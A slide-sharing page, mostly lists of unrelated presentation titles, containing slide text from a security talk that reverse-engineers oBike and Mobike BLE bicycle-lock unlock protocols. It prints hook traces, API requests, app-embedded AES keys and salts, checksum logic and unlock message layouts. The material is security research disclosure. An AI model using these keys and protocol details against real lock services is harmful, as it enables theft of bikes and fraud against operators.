Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

More from Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Recently uploaded

Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical InfrastructureVarsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructureitnewsafrica
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...itnewsafrica
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 

Recently uploaded (20)

Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical InfrastructureVarsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 

Hacking BLE Bicycle Locks for Fun and a Small Profit

  • 1. Hacking BLE Bicycle Locks for Fun & A Small Profit
  • 2. 1
  • 3. whoami • From Sunny Singapore • Senior Security Consultant @ MWR • Mobile and Wireless geek – BlackHat USA 2016 – Bad for Enterprise: Attacking BYOD Enterprise Mobile Security Solutions 2
  • 4. Bike-Sharing Economy and the BLE “Smart” Lock 1 Overview 3 Building a Master Key3 Demo 4 Analyzing Communications 2
  • 5.
  • 7. Major Players 6 Country China China Singapore Founded 2014 2015 2017 Operations 20 Countries 16 Countries 22 Countries Cost SGD$0.50/30min
  • 8. Bluetooth Low Energy Generic Access Profile (GAP) • Peripheral Small low powered device e.g. bicycle lock • Central High powered computing device e.g. Mobile Phone
  • 9. Bluetooth Low Energy 8 Generic Attribute Profile (GATT) • Services Groups of Characteristics 16/128-bit UUID • Characteristics A single data point 16/128-bit UUID
  • 15.
  • 16. Noke Lock Services and Characteristics
  • 17.
  • 18. Ubertooth One – Wireshark Capture
  • 19.
  • 21. iOS CoreBluetooth CBPeripheral • Remote peripheral devices that the app has discovered advertising or is currently connected to. • -m "*[CBPeripheral readValue*]" • -m "*[CBPeripheral writeValue*]" • -m "*[CBPeripheral setNotifyValue*]" CBPeripheralDelegate • Provides methods called on events relating to discovery, exploration, and interaction with a remote peripheral. • -m "*[* *didUpdateNotificationStateForCharacteristic*]" • -m "*[* *didUpdateValueForCharacteristic*]" 20
  • 22. Summary… Scan QR Code 01 02 Get Lock Key From Server 04 Request Encrypted Token 05 Gets Encrypted Token 06 Decrypt Token & Unlock! 03 Server Responds with Lock Key
  • 24. oBike Lock oBike lock teardown and rebuild, dockless share bike rescue: https://youtu.be/Vl3Gl8w8n-Q
  • 25. 24
  • 26. 02 App Checks Lock Status. Uploads Coordinates. 04 App Requests Key Source 05 App Gets Key Source 06 Request Unlock Key 07 Server Responds with Unlock Key 08 Unlock Bike Lock 03 Server Responds with Lock Status http://www.o.bike/download /app.html?m=065002064 01
  • 27. HTTP Message Encryption POST /api/v2/bike/060511449/lockNo HTTP/1.1 Host: mobile.o.bike Content-Type: application/json version: 3.2.4 Authorization: Bearer ***** {"value":"68693cfa10579681d81837350843342d9 9f0ba4373f9926c53c1f1c88576304d0b936e700388 8288fe949e73eb1d3267b713d2b261829ee04985234 23d6965db28e8b99854bf2adf592e51fb9da3b77068 f647b29caa5f22473ad01ec1011270a9d3a73100292 b0fdf331b17b37564556df790a58489d8cad3f4dd27 6d5ae68a95fc7effefc998de151eeb0983ddc721634 5e7682df8cf2de0d2cbf3a8b7e7c1c8f8604016c377 b0195b0ab9e83c604d"} POST /api/v2/bike/unlockPass HTTP/1.1 Host: mobile.o.bike Content-Type: application/json version: 3.2.4 Authorization: Bearer ***** {"value":"aa47e49f01cc740fdaa87973966 799f94bf02ced7416b15f1cc7f63bf52f50f9 28e76c5d7f911a054188751f7243d68daef4b 69b22432ec2166dc823f29de811e21f4adbfd b826748b9e2573912422b0a51f6a07a5c7be2 bf7d41b56d69945c3ecf3ec94444db5abb26b 8c771fe8eba91cb1a5d336cc2130bde9bcb25 350250bb92c5aa880b2e6c0b3c0004c11ab0f 14eb1182b78fb3dcb5eb68e61205ae5048"}
  • 28. HTTP Message Encryption - AES 27 9386 ms | | +[OBikeEncrypt aesEncryptString:{"deviceId":"1521828969000- 8035385","dateTime":"1521984609867.631836","longitude":103.8331503422035,"latitude":1.38163138646 7611}&58bc93f4ac249b829174520a5afe733503f371f8] 9388 ms | | | +[OBikeEncrypt aesEncryptData:<7b226465 76696365 4964223a 22313532 31383238 39363930 30302d38 30333533 3835222c 22646174 6554696d 65223a22 31353231 39383436 30393836 372e3633 31383336 222c226c 6f6e6769 74756465 223a3130 332e3833 33313530 33343232 3033352c 226c6174 69747564 65223a31 2e333831 36333133 38363436 37363131 7d263538 62633933 66346163 32343962 38323931 37343532 30613561 66653733 33353033 66333731 6638> keyData:<6f42694f 534d5946 557a4c65 64333234>] keyData:<6f42694f 534d5946 557a4c65 64333234> = oBiOSMYFUzLed324 oBiOSMYFUzLed 324AES Key
  • 29. HTTP Message Encryption – SHA1Sum 28 POST /api/v2/bike/unlockPass HTTP/1.1 Host: mobile.o.bike Content-Type: application/json version: 3.2.4 { "bikeId":"060511449", "deviceId":"1521828969000-8035385", "dateTime":"1521984617263.854980", "keySource":"c4f1dc24" }&ad6dad370f01782adfe200584ff63be31af29069 { "bikeId":"060511449", "deviceId":"1521828969000-8035385", "dateTime":"1521984617263.854980", "keySource":"c4f1dc24" }& oBiOSX4buhBMG 324
  • 30. POST /api/v2/bike/060511449/lockNo HTTP/1.1 Host: mobile.o.bike Content-Type: application/json version: 3.2.4 { "deviceId":"1521828969000-8035385", "dateTime":"1521984609867.631836", "longitude":103.8XXXXXXXX, "latitude":1.3XXXXXXXX }&58bc93f4ac249b829174520a5afe73 02 App Checks Lock Status. Uploads Coordinates. http://www.o.bike/download /app.html?m=065002064 01
  • 31. 03 Server Responds with Lock Status HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 Connection: close Vary: Accept-Encoding Content-Length: 93 {"data": {"lockNo":"639BADF22", "lockType":2, "faultBike":false}, "success":true,"errorCode":100}
  • 32. 16504 ms -[BluetoothManager peripheral:0x1742f6080 didDiscoverCharacteristicsForService:0x17667cb00 error:0x0] 16506 ms | -[CBPeripheral setNotifyValue:0x1 forCharacteristic: <CBCharacteristic: 0x1704ae100, UUID = FFF6, properties = 0x16, value = (null), notifying = NO>] 16515 ms | -[OBikeBluetoothManager BLEDidNotify] 16519 ms | | | | | | -[CBPeripheral writeValue:0x17483f980 forCharacteristic:0x1704ae100 type:0x1] 16519 ms | | | | | | writeValue -> _NSInlineData 16519 ms | | | | | | forCharacteristic -> CBCharacteristic 04 App Requests Key Source
  • 33. 16518 ms | | | | | +[BluetoothSendMessage sendRentBikeInstructionWithCBPeripheral:0x1742f6080 CBCharacteristic:0x1704ae100 Longti:0x0 Lat:0x0] 16519 ms | | | | | | +[BluetoothSendMessage setValueForRentBike:0x0 Lat:0x0] 16519 ms | | | | | | -[CBPeripheral writeValue:0x17483f980 forCharacteristic:0x1704ae100 type:0x1] 16519 ms | | | | | | writeValue -> _NSInlineData 16519 ms | | | | | | forCharacteristic -> CBCharacteristic 16774 ms -[BluetoothManager peripheral:0x1742f6080 didUpdateValueForCharacteristic:0x1704ae100 error:0x0] 16775 ms | | -[HandleBluetoothMessage checkBlueToothDataWith:0x170824b40] 16775 ms | | | +[BluetoothSendMessage GetBcc:0x170013ab0 size:0xc] 16781 ms | | -[OBikeBluetoothManager BLEGetBike:0x17045fec0] 16783 ms | | | +[OBikeEncrypt aesEncryptString:{"bikeId":"060511449","deviceId":“XXXXXXXXXX", "dateTime":"1521984617263.854980","keySource":"c4f1dc24"} &ad6dad370f01782adfe200584ff63be31af29069] 05 App Gets Key Source
  • 34. POST /api/v2/bike/unlockPass HTTP/1.1 Host: mobile.o.bike Content-Type: application/json version: 3.2.4 { "bikeId":"060511449", "deviceId":"1521828969000-8035385", "dateTime":"1521984617263.854980", "keySource":"c4f1dc24" }&ad6dad370f01782adfe200584ff63be31af29069 HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 Connection: close Vary: Accept-EncodingContent-Length: 130 {"data":{ "encryptionKey":180, "keys":"8be1be17d41e8fdff1ae1c82e4500fec", "serverTime":1521984619298 },"success":true,"errorCode":100} 06 Request Unlock Key 07 Server Responds with Unlock Key
  • 35. 19106 ms -[OBikeBluetoothManager openLock:0xb000000000000b43 keys:0x1718648c0 serverTime:0xb0001625d5a43223] 19107 ms | | -[BluetoothManager openLock:0xa383430343937327 Time:0x170440690 Key:0x1718648c0 encryptionKey:0xb4] 19108 ms | | | | | +[BluetoothSendMessage setValueForUnlock:1521984619.298000 Index:0xb4 Phone:0xa383430343937327 Key:8be1be17d41e8fdff1ae1c82e4500fec] 19113 ms | | | | | | +[BluetoothSendMessage ToHex:0x5ab7a46b] 19114 ms | | | | | | +[BluetoothSendMessage dataFromHexString:0x174a48550] 19114 ms | | | | | | +[BluetoothSendMessage dataFromHexString:0x174a28da0] 19114 ms | | | | | | +[BluetoothSendMessage GetBcc:0x174a45fd0 size:0x19] 19117 ms | | | | | | +[BluetoothSendMessage GetBcc] retval: 0xff 19118 ms | | | | | -[CBPeripheral writeValue:0x174a54340 forCharacteristic:0x1704ae100 type:0x1] 19118 ms | | | | | writeValue -> NSConcreteMutableData 19118 ms | | | | | forCharacteristic -> CBCharacteristic 19127 ms | | | | | -[CBPeripheral writeValue:0x174a53ef0 forCharacteristic:0x1704ae100 type:0x1] 19127 ms | | | | | writeValue -> NSConcreteMutableData 19127 ms | | | | | forCharacteristic -> CBCharacteristic 08 Unlock Bike Lock
  • 36. Unlock Algorithm Message 1 ??? Message Length Command 67 74 18 82 Message 2 AES Key (Truncated) BCC 8b e1 be 17 d4 1e 8f df f1 ae 1c 82 ff +[BluetoothSendMessage setValueForUnlock:1521984619.298000 Index:0xb4 Phone:0xa383430343937327 Key:8be1be17d41e8fdff1ae1c82e4500fec] Key Index ??? Date Time b4 00 00 02 79 40 48 00 6b a4 b7 5a BCC Calculation: for i in bytearr { x ^= i } return x bytearr = Command … AES Key
  • 38.
  • 40.
  • 41. 02 App Checks Lock Status. Uploads Coordinates. 04 Server Responds with Unlock Key 05 03 Server Responds with Lock Status http://www.mobike.com/down load/app.html?b=AXXXXXXX 01 Unlock Bike Lock
  • 42. HTTP Message Integrity Check 41 POST /api/v2/rentmgr/unlockBike.do?sign=b9441790c2e3c42a57b439b51995f546 HTTP/1.1 Host: app.mobike.com time: 1530100847000 mobileNo: +6512345678 accesstoken: XXXXXXXXXXXXXXXX platform: 0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 445 accesstoken=XXXXXXXXXXXXXXXX&bikecode=A0000XXXXX&biketype=0&btEnabled=1&channel=1&clie nt_id=ios&epdata=Es7dCTkXiZ1IV3H6z%2BS9R%2BYzRjFby0T4ADUNKh0aXm6wfZzfJtQEQ5IC%2By5lZYG KFVy8I9vP6wwvkKCEqxNSMMCM3WespduyU8Svj7qyadFV4pN/nbC1behZa7ew3V0G8ofy6udhTkjbWLcjWeWvi oJwrELB24aALccUKxCoMds%3D&latitude=1.3XXX&longitude=103.8XXX&mobileNo=+6512345678&time =1530100847000&timestamp=1530100847.123456&userid=XXXXXXXXX
  • 43. HTTP Message Encryption 42 30714 ms | +[RSA encryptString:XXXXXXXXXXuseridXXXXXXX#1530031691.737942 publicKey:MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCi/VezJp6KaJNXZCHpQ4YmKxlWrcrddow5pHDX3vHeiUqdOoJZJoBp UvFuFdlWEqP7itWNcPnuYAqRwXkh6xWD1oM4MrK4eH8/AzdGIgrcgq+pbB3DymgEujkHBhrxXqFiUS2OjfebKwU0xJTPQM/KcxjqGDZ xzswOxFJDxyKcwIDAQAB] enter mbk_lowercaseMd5 -> accesstoken=XXXXXXXXXX&bikecode=A0000XXXXX&biketype=0&btEnabled=1&channel=1&client_id=ios&epdata=Es7dCT kXiZ1IV3H6z+S9R+YzRjFby0T4ADUNKh0aXm6wfZzfJtQEQ5IC+y5lZYGKFVy8I9vP6wwvkKCEqxNSMMCM3WespduyU8Svj7qyadFV4 pN/nbC1behZa7ew3V0G8ofy6udhTkjbWLcjWeWvioJwrELB24aALccUKxCoMds=&latitude=1.381585998461937&longitude=10 3.8330852148159&mobileNo=+65XXXXXXXX&time=1530031691000&timestamp=1530031691.737942&userid=XXXXXXXXX@io ssecret leave mbk_lowercaseMd5 -> b9441790c2e3c42a57b439b51995f546
  • 44. 02 App Checks Lock Status. Uploads Coordinates. http://www.o.bike/download /app.html?m=065002064 01 POST /api/v2/rentmgr/unlockBike.do?sign=9623f419340536f95c31 4d81c4c2b548 HTTP/1.1 bikecode=A0000XXXXX&biketype=0&btEnabled=1&channel=1&cl ient_id=ios&epdata=ML1G%2BNjHnhzQPMoRZwtBx5k3c0yOBpBFZK ePvb3WsR0%2BWBvtT7saxcwIwbI6JAkG27HGjWKMGjeCwUyvw1zOgOA 17Lybmbv30ltfBwUkeFmpgklpG2YMEgFEEdCjYxhskfMtoLKWCz3WFB riiZ5S6yHnH5aT1yKe/YB7mMo1f0U%3D&latitude=1.3XXX&longit ude=103.8XXXX&timestamp=1530096030.920647&userid=XXXXX
  • 45. 03 Server Responds with Lock Status Faulty HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 Connection: close { "bikeHardwareType": 2, "bikeId": "AXXXXXXX", ... "message": "Our apologies, this bike needs maintenance, please use another one", ... } Good HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 Connection: close { "bikeHardwareType": 2, "bikeId": "AXXXXXXX", ... "object": { "authkey": "", "data": "001BB441CB88B4034565E1C7BE448CD4B3D9F5CAA8452A2323 5201", "orderid": "MBKA0000XXXXXXXX", ... 04 Server Responds with Unlock Key
  • 46. 05 Unlock Bike Lock 32484 ms -[MBKUnlockBikeData setData:001BB441CB88B4034565E1C7BE448CD4B3D9F5CAA8452A23235201] 35446 ms -[MBKPeripheral peripheral:<CBPeripheral: 0x1744ee380, identifier = 2B7D32FB-8B34-4C58-BB57- A37976F63FC3, name = mobike, state = connected> didDiscoverCharacteristicsForService:<CBService: 0x172679c80, isPrimary = YES, UUID = A000FAA0-0047-005A-0052-6D6F62696B65> error:0x0] 35449 ms | -[CBPeripheral setNotifyValue:0x1 forCharacteristic:<CBCharacteristic: 0x174aa45c0, UUID = A000FEE1-0047-005A-0052-6D6F62696B65, properties = 0x10, value = <31>, notifying = NO>] 35452 ms | -[CBPeripheral setNotifyValue:0x1 forCharacteristic:<CBCharacteristic: 0x174aa46e0, UUID = A000FEE0-0047-005A-0052-6D6F62696B65, properties = 0x8, value = <33324634 46454444 37363546 38453530 46324232>, notifying = NO>]
  • 47. 05 Unlock Bike Lock 35591 ms | -[MBKPeripheral writeString:30001BB441CB88B40345] 35592 ms | | -[CBPeripheral writeValue:0x17525e1b0 forCharacteristic:0x174aa46e0 type:0x0] 35592 ms | | writeValue -> _NSInlineData 35592 ms | | forCharacteristic -> CBCharacteristic
  • 48. 05 Unlock Bike Lock 35666 ms | -[MBKPeripheral writeString:3165E1C7BE448CD4B3D9] 35667 ms | | -[CBPeripheral writeValue:0x17145c410 forCharacteristic:0x174aa46e0 type:0x0] 35667 ms | | writeValue -> _NSInlineData 35667 ms | | forCharacteristic -> CBCharacteristic
  • 49. 05 Unlock Bike Lock 35739 ms | -[MBKPeripheral writeString:32F5CAA8452A23235201] 35741 ms | | -[CBPeripheral writeValue:0x17125e720 forCharacteristic:0x174aa46e0 type:0x0] 35741 ms | | writeValue -> _NSInlineData 35741 ms | | forCharacteristic -> CBCharacteristic
  • 50. Unlock Algorithm Message 1 Index ? Message 30 001BB441CB88B40345 32484 ms -[MBKUnlockBikeData setData:001BB441CB88B4034565E1C7BE448CD4B3D9F5CAA8452A23235201] Message 2 Index ? Message 31 65E1C7BE448CD4B3D9 Message 3 Index ? Message 32 F5CAA8452A23235201
  • 52.
